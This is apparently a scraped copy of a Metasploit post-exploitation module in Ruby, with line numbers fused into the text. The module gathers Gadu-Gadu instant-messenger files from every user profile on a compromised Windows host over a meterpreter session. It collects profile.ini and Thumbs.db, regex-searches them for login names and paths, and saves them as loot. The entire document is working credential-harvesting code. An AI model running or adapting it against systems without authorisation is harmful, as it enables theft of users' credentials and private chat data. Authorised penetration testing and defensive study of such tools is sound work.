Path: blob/master/modules/post/windows/gather/credentials/gadugadu.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Windows::UserProfiles8include Msf::Post::Windows::Packrat9ARTIFACTS =10{11application: 'gadugadu',12app_category: 'chats',13gatherable_artifacts: [14{15filetypes: 'chat_logs',16path: 'GG dysk',17dir: 'Galeria',18artifact_file_name: 'Thumbs.db',19description: 'Saved GaduGadu User Profile Images in Thumbs.db file',20credential_type: 'image'21},22{23filetypes: 'chat_logs',24path: 'AppData',25dir: 'GG',26artifact_file_name: 'profile.ini',27description: 'GaduGadu profile User information : Rename long saved artifactto in profile.ini',28credential_type: 'text',29regex_search: [30{31extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',32extraction_type: 'credentials',33regex: [34'(?i-mx:name=.*)',35'(?i-mx:login=.*)',36'(?i-mx:path=.*)'37]38}39]40}41]42}.freeze4344def initialize(info = {})45super(46update_info(47info,48'Name' => 'Gadugadu Credential Gatherer',49'Description' => %q{50This module searches for Gadugadu credentials on a Windows host. Gadu-Gadu is a Polish instant messaging client using a proprietary protocol. Gadu-Gadu was the most popular IM service in Poland.51},52'License' => MSF_LICENSE,53'Author' => [54'Kazuyoshi Maruta',55'Daniel Hallsworth',56'Barwar Salim M',57'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org58],59'Platform' => ['win'],60'SessionTypes' => ['meterpreter'],61'Notes' => {62'Stability' => [CRASH_SAFE],63'Reliability' => [],64'SideEffects' => []65}66)67)6869register_options(70[71OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),72OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),73OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),74# enumerates the options based on the artifacts that are defined below75OptEnum.new('ARTIFACTS', [76false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|77k[:filetypes]78end.uniq.unshift('All')79])80]81)82end8384def run85print_status('Filtering based on these selections: ')86print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")87print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")88print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")8990# used to grab files for each user on the remote host91grab_user_profiles.each do |userprofile|92run_packrat(userprofile, ARTIFACTS)93end9495print_status 'PackRat credential sweep completed'96end97end9899100